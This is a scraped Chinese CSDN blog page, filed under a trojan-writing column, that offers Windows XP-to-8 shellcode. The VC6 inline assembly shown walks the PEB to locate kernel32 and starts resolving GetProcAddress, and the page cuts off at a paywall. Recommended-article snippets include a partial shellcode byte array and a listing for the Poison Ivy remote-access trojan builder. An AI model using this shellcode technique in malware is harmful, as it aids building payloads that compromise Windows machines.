winxp、win2003、win7、win8通用的shellcode

最新推荐文章于 2024-07-12 12:02:53 发布
最新推荐文章于 2024-07-12 12:02:53 发布
阅读量6.6k 收藏 3
点赞数
分类专栏: 木马编写 C/SDK
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chinafe/article/details/31387425
版权
这篇博客分享了一段在VC6环境下编译的代码,该代码产生的shellcode适用于winxp、win2003、win7及win8系统。通过调试模式获取二进制代码并整理为shellcode。
摘要由CSDN通过智能技术生成

此代码在vc6下直接编译,提取shellcode时进行debug模式,打开内存窗口,复制出二进制代码,整理成shellcode就可以了

代码修改而来原文地址:http://hi.baidu.com/egodcore/item/c13e67fe197c940fc6dc45f5

int main()
{
    __asm{
		nop;
		nop;
		nop;
		nop;
		nop;
		nop;
		nop;

        push ebp;
        mov esi,fs:0x30;            //PEB
        mov esi, [esi + 0x0C];   //+0x00c Ldr              : Ptr32 _PEB_LDR_DATA
        mov esi, [esi + 0x1C];  //+0x01c InInitializationOrderModuleList : _LIST_ENTRY
next_module:
        mov ebp, [esi + 0x08];
        mov edi, [esi + 0x20];
        mov esi, [esi];
        cmp [edi + 12*2],cl;
        jne next_module;
        mov edi,ebp;
		
        //寻找GetProcAddress地址
        sub esp,100;
        mov ebp,esp;
        mov eax,[edi+3ch];//PE头
        mov edx,[edi+eax+78h]
			add edx,edi;
        mov ecx,[edx+18h];//函数数量
        mov ebx,[edx+20h];
        add ebx,edi;
search:
最低0.47元/天 解锁文章
冷风
关注
专栏目录
Win 7下定位kernel32.dll基址及shellcode编写1
08-03
Windows操作系统中,尤其是Windows 7环境下,动态定位kernel32.dll的基地址对于编写兼容性强的shellcode或恶意软件至关重要。kernel32.dll是Windows系统的核心动态链接库,提供了许多与用户界面、进程和线程管理、...
关于Windows下ShellCode编写的一点思考
老鬼的专栏
07-30 2312
关于Windows下ShellCode编写的一点思考                                        By Hume/冷雨  关于ShellCode编写的文章可谓多如牛毛。经典的有yuange、watercloud等前辈的文章,但大都过于专业和简练,对我这样的初学者学习起来还是有不小的难度。因此把自己的一点想法记录下来,以慰同菜。我不是工具论者,但合适的工具无疑会提高
windows下的shellcode剖析浅谈
稻草人的高粱地
11-04 797
 今天是中秋节,正好我的文章在今天基本完成,作为中秋礼物送给大家,由于本人水平有限希望大家多多批评指正!学习了好些日子了,思路总是乱乱的,这几天决定养成个好习惯,把自己学习的一些东西做一些总结写篇文章,以便归纳和总结,并从中能够更深刻更系统化的理解其技术原理。  今天,就从shellcode来下手吧!  说到shellcode可能都有些迷茫,不知它是什么东西,可能觉得也很神秘,对于它的专业解释也很
windowsxpwindows2003windows7、windows2008系统部署
最新发布
2401_83147397的博客
07-12 1217
虚拟机:VMware Workstation 15.5 Pro(建议升至最高版本)
一个MessageBox窗口[演示]ShellCode(WINXPSP2下测试通过)
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
03-29 1067
学习溢出时会用到 unsigned char ShellCode[] = {   0xE8,0x00,0x00,0x00,0x00,0x5F,0x81,0xEF,   0x1E,0x10,0x40,0x00,0x8D,0x87,0x83,0x10,   0x40,0x00,0x50,0xE8,0x61,0x00,0x00,0x00,   0x33,0xC0,0x6A,0x00,0x
编写windows的shellcode
qq_41224661的博客
06-04 203
windows的shellcode在很长时间是一件秘密的事。问题是,它不像Unix的shellcode, 你没有已知的系统调用API。而是,进程要加载函数指针到外部函数,比如CreateProcess或者ReadFile到内存的不同地方。
Windows Shellcode开发[1]
weixin_41487541的博客
03-24 514
0 前言 本文包含对shellcode开发技术及其特点的概述,了解了这些概念我们就可以编写自己的shellcode,而且我们还可以修改现有漏洞的shellcode来执行我们自定义的功能。 1 Shellcode介绍 维基百科中对shellcoed的介绍: “在计算机安全中,shellcode 是一小段代码,用作利用软件漏洞的有效载荷。之所以称为“shellcode”,是因为它通常启动一个命令shell,攻击者可以从中控制受感染的机器,但任何执行类似任务的代码都可以称为 shellcode……She
Poison Ivy 2.3.2 win7
06-05
Poison Ivy 2.3.2版本,包含win7编译器。使用方法:生成C array格式的服务端,打开patcher,将生成的代码全部拷入patcher编辑框,点击patch it键(可能因为程序界面问题遮盖住不显示,让光标位于编辑框内然后按tab键...
Win32 Shellcode.7z
05-20
Win32 Shellcode.7z Win32 Shellcode.7z
ie7 0day当中的shellcode的escape+xor21加密
09-06
总结来说,"ie7 0day当中的shellcode的escape+xor21加密"是一种高级的加密技术,它结合了VBScript和JavaScript的特性,通过对shellcode进行异或和URL编码的处理,来隐藏和混淆攻击代码,从而逃避安全检查。...
Windows Shellcode开发[2]
weixin_41487541的博客
03-24 4523
0 前言 在这部分我们将了解正确编写Windows系统shellcode所需的信息:进程环境块和PE文件格式。上一部分在这里:Windows Shellcode开发[1] 1 进程环境块 在Windows操作系统中,PEB作为一种结构可以用于内存中固定地址的每个进程。此结构包含进程相关信息,如:可执行文件加载到内存中的地址、模块列表(DLL)、指定进程是否在调试等。在不同版本的Windows系统中,PEB各字段偏移可能会随之改变。 由于地址空间布局随机化(ASLR),DLL将被加载到不同的内存地址,
windows 平台shellcode编写
fanghuapyk的博客
05-21 894
0x00、介绍 比方说你手头上有一个IE或FlashPlayer现成的漏洞利用代码,但它只能够打开计算器calc.exe。但是这实际上并没有什么卵用,不是吗?你真正想要的是可以执行一些远程命令或实现其他有用的功能。 在这种情况下,你可能想要利用已有的标准shellcode,比如来自Shell Storm数据库或由Metasploit的msfvenom工具生成。不过,你必须先理解编写shellcode的基本原则,才可以在自己的漏洞利用代码中有效地使用它们。对于不熟悉这个术语的同学们,可以参考一下维基百科: 在
打造Windows下自己的ShellCode
P-Blog
08-30 3031
打造Windows下自己的ShellCode 文/图 王炜/ww0830    为了帮助初学者了解ShellCode的编写,并能一步一步操作得到自己的ShellCode,因此将Windows下ShellCode的编写过程作详细的介绍,以利于像我一样的菜鸟,最终能够写出简单的但却是真实的ShellCode;而进一步高级的ShellCode的编写,也会在系列后面的文章中一步一步的演示的,希望大家会
shellcode入门(win
weixin_33755847的博客
06-04 208
重要的事情说下,搞windows安全一定要用win电脑实体机。我用的mac出现很多bug 好多函数地址获取不到。因此写shellcode 一定要注意平台1。先写个有缓冲区溢出的代码 // ConsoleApplication1.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include<windows.h> #define PASSWORD...
shellcodeWindows shellcode的理解与编写
dr0op's blog
03-31 1089
虚拟内存空间 整个虚拟内存空间分为两个相关部分: 为用户进程预留的虚拟内存空间和为系统进程预留的虚拟内存空间。 每个进程都有自己的私有虚拟地址空间,其中“内核空间”是一种“共享环境”,意味着每个内核进程可以在任何它想要的地方读写虚拟内存。 其中: HEAP(堆) : 这是存储所有动态局部变量的地方。(通常alloc()或类似的系统调用) STACK(栈): 分配每个静态局部变量的位置。 RWX-Hunter执行: 搜索已被标记为读(R),写(W)和执行(X)的内存部分。 遍历进程的虚拟空间内存,搜索标记
windows shellcode 总结
weixin_34267123的博客
12-03 246
说到shellcode可能都有些迷茫,不知它是什么东西,可能觉得也很神秘,对于它的专业解释也很少有人提及,今天我们就从以下几个方面来对windows下的shellcode做一个全剖析: 1. shellcode的发展历史以及定义 2. 现今常见的windows下的shellcode种类 3. 编写shellcode流程 4. shellocode举例 5、shell...
windows下shellcode编写入门
热门推荐
x_nirvana的博客
03-31 1万+
本文简要介绍shellcode开发技术及其特点。理解这些概念可以有助于我们编写自己的shellcode。更进一步讲,你可以修改现有的漏洞利用代码来执行自己所需要的定制功能。
编写Windows Kernel Shellcode
Sven的忘却日记
07-14 1117
网上流传的永恒之蓝漏洞利用代码中,关于内核shellcode部分,大部分都是利用APC注入的。 最近有个想法,直接利用内核代码执行权限,来写文件,于是就抄起了VS,开始写shellcode,开始以为和R3下面写shellcode一样简单… 新建个驱动的项目,按照下面修改项目的属性,然后动态获取API,再调API完成自己的功能。 // C/C++ // |-常规 // | |-调试信息格式:程序数...
Windows ShellcodeWin32汇编组件解析
本文档详细阐述了Windows汇编语言在实际应用中的几个重要方面,特别关注于shellcode的编写,这对于理解系统底层工作原理和安全领域至关重要。首先,文档介绍了如何在Windows环境下通过汇编语言来获取和调用Windows ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值